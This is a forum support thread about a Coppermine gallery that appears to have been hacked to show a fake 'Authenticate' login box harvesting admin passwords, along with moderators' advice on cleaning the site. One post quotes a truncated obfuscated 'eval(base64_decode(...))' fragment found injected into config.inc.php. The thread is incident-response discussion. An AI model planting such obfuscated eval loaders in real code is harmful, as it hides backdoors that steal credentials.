forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: sandramichelle on November 27, 2008, 02:27:17 am

Title: Authenticate?
Post by: sandramichelle on November 27, 2008, 02:27:17 am
When trying to change some configuration settings, I click on "save new configuration" and come to a screen that says "Authenticate" with a box for user name and password.  I put mine in, and it goes back to my home page and the changes have not been made.

Can anyone help me with fixing this, please?  I have looked through the forum but if this was touched on in a prior post, I couldn't locate it.

Thanks!
Title: Re: Authenticate?
Post by: Nibbler on November 27, 2008, 04:55:14 am
Can you post a screenshot of this? Doesn't sound like part of Coppermine to me.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 03:15:33 pm
HI, I've got the same problem since today!

Yesterday, I didn't see my Captcha Image anymore. I disabled Captcha via PHPAdmin in order to be able to login. Then I removed Captcha with the Coppermine Plugin manager. Now, when trying to make changes to my Coppermine settings, this "Authenticate" screen appears. And no changes are accepted.
(http://www11.file-upload.net/thumb/29.11.08/mpdmk2.gif) (http://www.file-upload.net/view-1284131/authenticate.gif.html)

Please help!

lumo

Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 03:19:59 pm
Screen after pressing submit button on authenticate screen:
(http://www11.file-upload.net/thumb/29.11.08/fo5eg.gif) (http://www.file-upload.net/view-1284145/authenticate2.gif.html)

lumo
Title: Re: Authenticate?
Post by: Nibbler on November 29, 2008, 03:36:28 pm
Can you zip up your admin.php and attach it to this thread please. Is your gallery up to date?
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 03:53:04 pm
I've just updated to last version.

Here's the admin.php:

http://www.file-upload.net/download-1284208/adminphp.zip.html

btw: How can I edit posts?

greetings
lumo

Title: Re: Authenticate?
Post by: Nibbler on November 29, 2008, 04:00:53 pm
You can't edit posts. Please attach files to the thread instead of using some other website.

I wanted the version of admin.php that gives you this 'authenticate' box not the clean 1.4.19 version.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 04:19:29 pm
Sorry, I'm new here. This is the admin.php i downloaded from my Coppermine directory. Are there different admin.php in the directory?

How can I attach a file properly?

Cheers  ;)
lumo
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 04:28:55 pm
Okay, I found out how to attach.

lumo
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 09:03:35 pm
Hi Nibbler,

any idea what's the problem here?

Greetings
lumo
Title: Re: Authenticate?
Post by: Nibbler on November 29, 2008, 09:13:28 pm
The attached file is the 1.4.19 version again. Do you actually have the original?

Could be some other script interfering (possibly accidentally), or a hack to steal admin passwords.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 09:58:07 pm
So then, would it be better to set up a whole new gallery and delete the old one, that is, make a new install rather than an update?

Concerning the admin.php, as I told you, I downloaded it directly from the coppermine folder (cpg148) on my webspace. I made the update to version 1.4.19 yesterday. So why are you astonished about the admin.php version?

I guess this is the only admin.php file which should be situated in the cpgxxx directory, isn't it?

lumo
Title: Re: Authenticate?
Post by: Joachim Müller on November 29, 2008, 10:33:45 pm
You probably have been hacked before performing the upgrade - your issues sound familiar: read up http://forum.coppermine-gallery.net/index.php/topic,56516.msg276234.html#msg276234 - the user there reported the very same thing.
Please note that upgrading a gallery that already was hacked won't make the hack go away - you have to sanitize your entire webspace.
Title: Re: Authenticate?
Post by: lumo on November 29, 2008, 11:54:38 pm
Hallo Joachim, danke für den Hinweis. Ich mach jetzt erst mal ein Backup von meinen htdocs.
Die Galerie kann ich nicht auf Wartungsmodus stellen, weil ich ja nichts verändern kann. Ich denke, ich werde von Grund auf alles neu aufbauen.

Hi Joachim, thanks for your hint. First, I'm going to make a backup of my htdoc files. I can't set the gallery into maintenance mode because of the (assumed) hack. I think I'll need to rebuild everything.  :'(

lumo
Title: Re: Authenticate?
Post by: Joachim Müller on November 30, 2008, 09:35:24 am
It doesn't hurt if you can't put the gallery into maintenance mode. Skip that step from the sanitization instructions - it is only meant to make sure that the content of your gallery doesn't change during sanitization because of users uploading images. Starting from scratch will not automatically sanitize your webspace. The attacker may have left behind a backdoor somewhere outside of the coppermine folder. I strongly suggest that you sanitize as suggested. Only English please on this part of the forum.
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 12:32:24 pm
May I post my first results of sanitization?
Code: [Select]
<? /**/eval(base64_decode('aWY
Code: [Select]
<?php
// Coppermine configuration file

// MySQL configuration
$CONFIG['dbserver'] =                         'xxx';        // Your databaseserver
$CONFIG['dbuser'] =                         'xxx';        // Your mysql username
$CONFIG['dbpass'] =                         'xxx';                // Your mysql password
$CONFIG['dbname'] =                         'xxx';        // Your mysql database name


// MySQL TABLE NAMES PREFIX
$CONFIG['TABLE_PREFIX'] =                'xxxx';
?>

Would anyone be so kind (I know well that you are all very busy) and analyze the content of the messy config.inc.php in order to find out, what it does?

I'll continue, if I may.

Yours
lumo
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 12:44:05 pm
I forgot one thing:

In the /include folder, "install.lock" was not empty. It contained the text "locked"
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 01:27:25 pm
Report continued:


Result: "Authenticate" screen still appears. Damn!

Then I did the following:

As I knew I had no plugins installed, but there were a lot of them (uninstalled ones) in my plugins folder (don't ask me how or when I got them ...), I decided to remove all of them.


So how to continue now?

Yours
lumo
Title: Re: Authenticate?
Post by: lumo on November 30, 2008, 04:35:19 pm
Note:
Also the file "themes.php" in my customized "gray satin" theme was affected. At the beginning of the file, I found some code that should not be there. I replaced the file with an original version of "themes.php". Are you interested in the code that was smuggled in? Tell me, so I could post a screenshot.

Thank you very much, Joachim!
Title: Re: Authenticate?
Post by: Joachim Müller on November 30, 2008, 11:50:48 pm
No thanks, the payload is unimportant for us, as it may differ on the next attack.
Title: Re: Authenticate?
Post by: lumo on December 01, 2008, 08:37:13 am
Ok. I wonder what threadopener sandramichelle found out - btw. sorry for kind of hijacking your thread!  ;)
Title: Re: Authenticate?
Post by: Hein Traag on December 01, 2008, 09:22:58 am
As Joachim said that is not important. The more important is given in the threads on how to deal with a hack.
Title: Re: Authenticate?
Post by: Joachim Müller on December 01, 2008, 09:48:38 am
Hack forensics (i.e. analyzing the payload of a hack and drawing conclusions from that) is something that only very skilled people can accomplish who have a security background. In fact you need to be a hacker to understand a hacker. It doesn't make sense for you as website owner to waste time and energy to find out what a malicious script has done unless you're skilled enough to read the malicious script and understand where to look into especially. However, this approach has got a flaw: analyzing that one payload file you found to figure out what the attacker did might make you ignore other backdoors or payload files. For a thorough sanitization, you can not just review the payload file: you need to sanitize your entire webspace. If you're really concerned, ask your webhost for support. The reason for that: in the past, malicious attacks have been run against entire webserver with hundreds of shared webhosting accounts on it. If the webhost had a flaw in his mechanisms that are suppossed to shield the separate accounts against each other, one infected account was enough to infect the entire server, including areas that you as user on that shared webhosting server can't even access (root-only areas). Therefor, it's always a good idea to contact your webhost and confess that you have been hacked, even it was you who is to blame because of reluctance to update your apps. The webhost should be informed anyway - a good webhost will take this seriously and at least perform some sort of security scan or audit just to make sure his entire webserver wasn't hacked along as well.

I can understand that you are concerned and exited and want to use all resources available (including this board) that will help you bring your webspace back to normal level. However, as in previous incidents, there's no use in ranting: as far as we concerned, we can only provide the most recent fixes in a timely manner - the rest is up to you. Think of the Yikes-thread as a courtesy that actually is beyond of what you can expect from regular support boards. You definitely can't expect an analysis of the payload that was uploaded to your webserver because of your reluctance to upgrade in a timely manner. It's quite natural to try to blame others for mistakes, but you have to face the truth: it's your task to keep your website clean and up to date.

Joachim